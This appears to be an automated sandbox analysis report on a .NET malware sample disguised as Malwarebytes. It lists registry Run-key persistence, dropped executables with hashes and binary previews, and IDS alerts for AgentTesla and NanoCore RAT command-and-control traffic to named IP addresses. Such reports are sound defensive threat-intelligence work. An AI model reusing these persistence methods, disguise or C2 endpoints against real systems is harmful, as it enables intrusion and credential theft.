                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, arc.msn.com
                              • Execution Graph export aborted for target excel.exe, PID 620 because it is empty
                              • Execution Graph export aborted for target excel.exe, PID 6964 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              TimeTypeDescription
                              13:23:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qjarsxlh "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                              13:24:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qjarsxlh "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                              13:24:05API Interceptor1x Sleep call for process: TM57812337.exe modified
                              13:24:29API Interceptor220x Sleep call for process: InstallUtil.exe modified
                              13:24:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe
                              13:24:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe
                              13:24:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qylfpmj "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe"
                              13:24:59API Interceptor1x Sleep call for process: Qqsucntzxgqwkiqkvrafiufflip.exe modified
                              13:25:02API Interceptor2x Sleep call for process: Qjarsxlh.exe modified
                              13:25:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qylfpmj "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe"
                              No context
                              No context
                              No context
                              No context
                              No context
                              Process:C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.35816127824051
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                              MD5:31E089E21A2AEB18A2A23D3E61EB2167
                              SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                              SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                              SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                              Malicious:false
                              Reputation:unknown
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                              Process:C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.35816127824051
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                              MD5:31E089E21A2AEB18A2A23D3E61EB2167
                              SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                              SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                              SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                              Malicious:false
                              Reputation:unknown
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                              Process:C:\Users\user\Desktop\TM57812337.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):847
                              Entropy (8bit):5.35816127824051
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                              MD5:31E089E21A2AEB18A2A23D3E61EB2167
                              SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                              SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                              SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                              Malicious:true
                              Reputation:unknown
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                              Process:C:\Users\user\AppData\Roaming\excel\excel.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):950
                              Entropy (8bit):5.350971482944737
                              Encrypted:false
                              SSDEEP:24:MLiKNE4qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MeIH2HKXwYHKhQnoPtHoxHhAHKzva
                              MD5:CEE81B7EB08EE82CFE49E47B81B50D1A
                              SHA1:4746C7068BD50E3309BFFDBE8983B8F27D834DFD
                              SHA-256:B9A90255691E7C9D3CCBD27D00FC514DDD6087446D8DB03335CEF1B5634CC460
                              SHA-512:AF5865439412974FCB6B11E22CFFF1ACA0BEBF83CF398D6056CEEF93720AF0FBCB579858C39E6AA0D989680F2180F2CA181D7D12887604B420D0E1976B8AEA77
                              Malicious:false
                              Reputation:unknown
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                              Process:C:\Users\user\Desktop\TM57812337.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):25088
                              Entropy (8bit):3.8435229760218617
                              Encrypted:false
                              SSDEEP:192:P0VuHfQXv9P5zP4P0f1HwkUllllllllllllllllllllllllllllllllllllllllh:P0VuHIXvJdP4P0tHwO4u
                              MD5:9E72E89826413EA6BA69E1F3907E9901
                              SHA1:E6AF6290BDE6AECF8538FB578DD6A1576A29574B
                              SHA-256:CAC254710105CC8570A515B0A684F88D9F6EEA84DF9C6C418E726A8F6C6FE789
                              SHA-512:A9A83641E741C57DBF1D153B6491117BF36B20B70E44C28DB15C9C1AB1DC3A81FA75F9D5328F82BDFE019CC9BEEA217246871905964875723F99E7372070A8ED
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 69%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0......J......^4... ........@.. ....................................@..................................4..K....@...H........................................................................... ............... ..H............text...d.... ...................... ..`.rsrc....H...@...H..................@..@.reloc...............`..............@..B................@4......H.......H$...............#..............................................".(.....*".(.....*..s.........+..+..+.(....+.(....+.(....+..*..~....r...p(....(....o....o....&*..0..>.........+.~....r...p..o......u.....+..+.~....r...p.r...po....o....&*...0..F.........+.~....r...p..o......u.....+..+.~....rM..p.rQ..p .......o....o....&*...0..[........rs..p(....+C(....+0..#......4@(.....+..+..(....(......+..+...-.+.+..+..(.....+..+....+...*..0..>........s.......i.+......+..+..%.Y.....+..+
                              Process:C:\Users\user\Desktop\TM57812337.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):25088
                              Entropy (8bit):3.850374276845012
                              Encrypted:false
                              SSDEEP:192:Mf8VkNtIz9D7XnXJlEBwXORllllllllllllllllllllllllllllllllllllllllB:MkVa+9rnXJlEBwXY9SS
                              MD5:DE791F645B2235DCE3572C7C5961E17B
                              SHA1:6568E7698EC8A060E0ED98CF7C11DE815867D195
                              SHA-256:C6523795348CBF7E88F40CF12CF9AB092242E54FDC972E6EF4591BB3B5497275
                              SHA-512:EC8C518703AC386A95EBD1C7F2E7AF8688A80C9AABB3542F49798028E480A9D3ADCBC424FF04C159C8B247F760CC7BDD44976894576E3204C4BED509B296C1F0
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 27%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@?.b..............0......J......~4... ........@.. ....................................@.................................$4..W....@...H........................................................................... ............... ..H............text........ ...................... ..`.rsrc....H...@...H..................@..@.reloc...............`..............@..B................`4......H.......H$...............#..............................................".(.....*".(.....*..s.........+..+..+.(....+.(....+.(....+..*..~....r...p(....(....o....o....&*..0..>.........+.~....r...p..o......u.....+..+.~....r...p.r...po....o....&*...0..F.........+.~....r...p..o......u.....+..+.~....r-..p.r1..p .......o....o....&*...0..[........rc..p(....+C(....+0..#......4@(.....+..+..(....(......+..+...-.+.+..+..(.....+..+....+...*..0..>........s.......i.+......+..+..%.Y.....+..+
                              Process:C:\Users\user\Desktop\TM57812337.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:unknown
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8
                              Entropy (8bit):3.0
                              Encrypted:false
                              SSDEEP:3:Zq:A
                              MD5:93F59CDE7D117001E5A53321BAE6DE1E
                              SHA1:8F665AB996118BBD181A1DC97D184B6C3B9ACE7A
                              SHA-256:3D14A9C1936E4F154743C8B4D89CAF24B103BAAB746ED98B759C464534D947BD
                              SHA-512:F02357146E239DDDC4385C5F111AF694C07F2622E68CA38297AD19795C7D803B9B487B658DD3549D704577443BCBA179D2BA079DD8FA2F21B23CA0B2DCAAE638
                              Malicious:true
                              Reputation:unknown
                              Preview:..q..@.H
                              Process:C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):25088
                              Entropy (8bit):3.8435229760218617
                              Encrypted:false
                              SSDEEP:192:P0VuHfQXv9P5zP4P0f1HwkUllllllllllllllllllllllllllllllllllllllllh:P0VuHIXvJdP4P0tHwO4u
                              MD5:9E72E89826413EA6BA69E1F3907E9901
                              SHA1:E6AF6290BDE6AECF8538FB578DD6A1576A29574B
                              SHA-256:CAC254710105CC8570A515B0A684F88D9F6EEA84DF9C6C418E726A8F6C6FE789
                              SHA-512:A9A83641E741C57DBF1D153B6491117BF36B20B70E44C28DB15C9C1AB1DC3A81FA75F9D5328F82BDFE019CC9BEEA217246871905964875723F99E7372070A8ED
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 69%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0......J......^4... ........@.. ....................................@..................................4..K....@...H........................................................................... ............... ..H............text...d.... ...................... ..`.rsrc....H...@...H..................@..@.reloc...............`..............@..B................@4......H.......H$...............#..............................................".(.....*".(.....*..s.........+..+..+.(....+.(....+.(....+..*..~....r...p(....(....o....o....&*..0..>.........+.~....r...p..o......u.....+..+.~....r...p.r...po....o....&*...0..F.........+.~....r...p..o......u.....+..+.~....rM..p.rQ..p .......o....o....&*...0..[........rs..p(....+C(....+0..#......4@(.....+..+..(....(......+..+...-.+.+..+..(.....+..+....+...*..0..>........s.......i.+......+..+..%.Y.....+..+
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):41064
                              Entropy (8bit):6.164873449128079
                              Encrypted:false
                              SSDEEP:384:FtpFVLK0MsihB9VKS7xdgE7KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+sPZTd:ZBMs2SqdD86Iq8gZZFyViML3an
                              MD5:EFEC8C379D165E3F33B536739AEE26A3
                              SHA1:C875908ACBA5CAC1E0B40F06A83F0F156A2640FA
                              SHA-256:46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
                              SHA-512:497847EC115D9AF78899E6DC20EC32A60B16954F83CF5169A23DD3F1459CB632DAC95417BD898FD1895C9FE2262FCBF7838FCF6919FB3B851A0557FBE07CCFFA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..h>...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                              Process:C:\Users\user\AppData\Roaming\excel\excel.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2017
                              Entropy (8bit):4.663189584482275
                              Encrypted:false
                              SSDEEP:48:zK4Qu4D4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKJDEcTytNe3Wo3uQVBIe+5
                              MD5:9C305D95E7DA8FCA9651F7F426BB25BC
                              SHA1:FDB5C18C26CF5B83EF5DC297C0F9CEBEF6A97FFC
                              SHA-256:444F71CF504D22F0EE88024D61501D3B79AE5D1AFD521E72499F325F6B0B82BE
                              SHA-512:F2829518AE0F6DD35C1DE1175FC8BE3E52EDCAFAD0B2455AC593F5E5D4BD480B014F52C3AE24E742B914685513BE5DF862373E75C45BB7908C775D7E2E404DB3
                              Malicious:false
                              Reputation:unknown
                              Preview:Microsoft (R) .NET Framework Installation utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):3.850374276845012
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:TM57812337.exe
                              File size:25088
                              MD5:de791f645b2235dce3572c7c5961e17b
                              SHA1:6568e7698ec8a060e0ed98cf7c11de815867d195
                              SHA256:c6523795348cbf7e88f40cf12cf9ab092242e54fdc972e6ef4591bb3b5497275
                              SHA512:ec8c518703ac386a95ebd1c7f2e7af8688a80c9aabb3542f49798028e480a9d3adcbc424ff04c159c8b247f760cc7bdd44976894576e3204c4bed509b296c1f0
                              SSDEEP:192:Mf8VkNtIz9D7XnXJlEBwXORllllllllllllllllllllllllllllllllllllllllB:MkVa+9rnXJlEBwXY9SS
                              TLSH:10B2A251EF8C4E36DA263AF25B23F24002399ED25946CB5C24E030466EF2FF50E7E924
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@?.b..............0......J......~4... ........@.. ....................................@................................
                              Icon Hash:4b98d8d6d8d87046
                              Entrypoint:0x40347e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x628F3F40 [Thu May 26 08:50:08 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x34240x57.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4800.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x14840x1600False0.539950284091data5.32712812921IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc0x40000x48000x4800False0.0608723958333data2.69126320793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x41000x4028data
                              RT_GROUP_ICON0x81380x14data
                              RT_VERSION0x815c0x3a2data
                              RT_MANIFEST0x85100x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              DLLImport
                              mscoree.dll_CorExeMain
                              DescriptionData
                              Translation0x0000 0x04b0
                              LegalCopyright Malwarebytes. All rights reserved.
                              Assembly Version4.0.0.1292
                              InternalNameTM57812337.exe
                              FileVersion4.0.0.1292
                              CompanyNameMalwarebytes
                              LegalTrademarks
                              CommentsMalwarebytes
                              ProductNameMalwarebytes
                              ProductVersion4.0.0.1292
                              FileDescriptionMalwarebytes
                              OriginalFilenameTM57812337.exe
                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              3.124.188.36192.168.2.380497612848901 05/27/22-13:24:10.756098TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497613.124.188.36192.168.2.3
                              3.124.188.36192.168.2.380497622848901 05/27/22-13:24:20.545192TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497623.124.188.36192.168.2.3
                              3.124.188.36192.168.2.380497662848901 05/27/22-13:25:07.485286TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497663.124.188.36192.168.2.3
                              3.124.188.36192.168.2.380497672848901 05/27/22-13:25:16.920685TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497673.124.188.36192.168.2.3
                              192.168.2.345.133.1.4149768802034579 05/27/22-13:25:27.451658TCP2034579ET TROJAN AgentTesla Communicating with CnC Server4976880192.168.2.345.133.1.41
                              3.124.188.36192.168.2.380497182848901 05/27/22-13:23:20.279494TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497183.124.188.36192.168.2.3
                              3.124.188.36192.168.2.380497532848901 05/27/22-13:24:02.781091TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)80497533.124.188.36192.168.2.3
                              192.168.2.374.201.28.111497761412816766 05/27/22-13:25:39.268141TCP2816766ETPRO TROJAN NanoCore RAT CnC 749776141192.168.2.374.201.28.111
                              192.168.2.345.133.1.4149763802034579 05/27/22-13:24:46.794494TCP2034579ET TROJAN AgentTesla Communicating with CnC Server4976380192.168.2.345.133.1.41
                              TimestampSource PortDest PortSource IPDest IP
                              May 27, 2022 13:23:20.096235037 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.116422892 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.116561890 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.135869026 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.156112909 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156145096 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156167030 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156188965 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156209946 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156230927 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156232119 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.156253099 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156274080 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156294107 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156302929 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.156316042 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.156337976 CEST4971880192.168.2.33.124.188.36
